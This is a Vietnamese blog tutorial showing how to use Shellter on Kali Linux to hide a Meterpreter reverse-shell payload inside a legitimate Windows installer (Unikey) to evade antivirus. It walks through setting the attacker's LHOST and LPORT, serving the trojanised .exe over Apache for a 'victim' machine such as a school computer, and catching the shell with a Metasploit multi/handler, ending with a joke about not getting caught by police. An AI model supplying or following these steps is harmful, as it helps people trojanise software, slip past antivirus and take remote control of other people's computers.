[Security cơ bản] Bài 1: Footprinting and Reconnaissance (Thu thập và tìm kiếm thông tin)
November 20, 2018
Stace - Phần mềm tối ưu hoá và giám sát hệ thống Linux
Stacer – Phần mềm tối ưu hoá và quản lý hệ thống Linux
November 26, 2018

Cách bypass Anti-Virus với Kali Linux bằng Shellter

Shellter - Bypass Anti-Virus

Thế Shellter là gì 🤔

   Là công cụ vượt mặt phần mềm chống Virus trên Windows bằng cách nhúng mã độc vào các tệp tin .EXE hay các ứng dụng Windows. Hiện tại thì mình dùng Shellter trên cả Windows và Linux.

 

Vậy làm sao để sử dụng Shellter?

   Trước tiên, bạn cần cài đặt Shellter:

 * Cho Windows: nhấp vô đây.

 * Cài đặt trên Kali Linux và các bản phân phối khác: sudo apt-get update && sudo apt-get install shellter.

 * Nếu bạn đã nhập câu lệnh trên rồi nhưng máy chủ lưu trữ gói cài đặt không có sẵn Shellter thì bạn tải tệp .DEB (cho Debian thôi 😛) và cài đặt thủ công: nhấp vô đây.

 

   Về việc sử dụng Shellter thì theo quan điểm cá nhân của mình thì dùng trên Linux vẫn là tốt nhất nên bài này mình chỉ hướng dẫn dùng Shellter trên Kali Linux thôi :V

 * Bước 1: cài đặt Shellter theo phần trên.

 * Bước 2: Hãy tải hoặc chuẩn bị một tệp chương trình .EXE, hoặc có thể dùng luôn Unikey như hướng dẫn của Trâu Tếch :V.

 * Bước 3: nhập sudo shellter trong Terminal để khởi chạy Shellter và Install Wine.

 * Bước 4: Ở phần Choose Operation Mode, nếu không muốn thiết lập thủ công thì cứ nhấn phím A và Enter cho nó tự động :).

 * Bước 5: Đến phần PE Target như hình dưới thì bạn mở thư mục chứa tệp .EXE vừa tải (mà ở đây là Unikey) và kéo thả tệp đó vào Terminal rồi Enter hoặc nhập thủ công đường dẫn đến tệp tin đó rồi Enter.

Cách Bypass Anti-Virus với Kali Linux bằng Shellter

 * Bước 6: Đến đoạn Use a listed payload or custom như hình dưới thì các bạn cứ nhấn phím L rồi Enter hoặc nhấn phím C rồi Enter nếu muốn tự tuỳ chỉnh. Rồi nhấn phím 1 và Enter để dùng payload của Meterpreter giao thức TCP (thuận theo hướng dẫn thôi :V).

Cách Bypass Anti-Virus với Kali Linux bằng Shellter

 * Bước 7: Mở một của sổ Terminal khác, nhập hostname -I và sao chép địa chỉ IP mạng LAN (mục đích học tập) đó.

 * Bước 8: Mở lại của sổ Terminal đang chạy Shellter, ở phần SET LHOST (là địa chỉ máy tấn công để điều khiển máy tính nạn nhân) như hình dưới thì dán hoặc nhập địa chỉ IP ở bước trên vào, ở phần SET LPORT thì nhập sốcủa cổng, ví dụ như 4444.

Cách Bypass Anti-Virus với Kali Linux bằng Shellter

 * Bước 9: Tìm cách cài tệp tin đã nhúng mã độc vào mán tính nạn nhân (Vì vừa rồi dùng IP mạng LAN vì mục đích học tập nên ta chọn máy nào cùng mạng LAN như WiFi hay máy tính phòng tin nhà trường nha 🙂).

   Ví dụ như sao chép tệp tin đó vào ổ cứng di động như USB rồi cài thủ công lên máy nạn nhân. Hoặc bạn có thể mở một cửa sổ Terminal khác và dùng lệnh cp [đường dẫn đến tệp tin như ở bước 5] "/var/www/html/"

   (ví dụ cp "/root/Desktop/unikey.exe" "/var/www/html/"), rồi nhập service apache2 start để khởi động Apache.

   Sau đó, bạn mở máy sẽ là nạn nhân nên, vô trình duyệt và nhập [địa chỉ IP mạng LAN của máy tấn công]/[tên tệp chứa mã độc]

   (ví dụ 192.168.1.618/unikey.exe). Sau khi tệp chứa mã độc vào máy nạn nhân rồi thì chạy nó thôi. Hình dưới chụp từ video để tham khảo:

Shellter - Bypass Anti-Virus

Shellter - Bypass Anti-Virus

 * Bước 10: Sau khi đã làm xong hết các bước trên thì nhập msfconsole để chạy Metasploit. Lần lượt nhập các lệnh sau

use multi/handler

set payload windows/meterpreter/reverse_tcp (Nếu ở bước 6 bạn chọn 2 hoặc 3 thì thay bằng reverse_http hoặc reverse_https tương ứng)

set lhost [địa chỉ IP mạng LAN máy tấn công] (Địa chỉ IP ở bước 7 ý)

set lport [số của cổng] (Ở đây là set lport 4444)

exploit

Shellter - Bypass Anti-Virus

 

Video ví dụ cho mấy đứa coi cho dễ hiểu hơn:

Đó, chúc mấy đứa tập hack zui zẻ (đừng để giáo viên hay các chú Công an Nhân Dân bắt được nha :))

Tham khảo và sử dụng hình ảnh từ Trẩu Tếchcái video trên,
cộng với những phần tự động não của thằng viết bài này như cái ảnh đầu :V

Hits: 244

GitHackTools
GitHackTools
Vào đây là biết hết: https://githacktools.blogspot.com/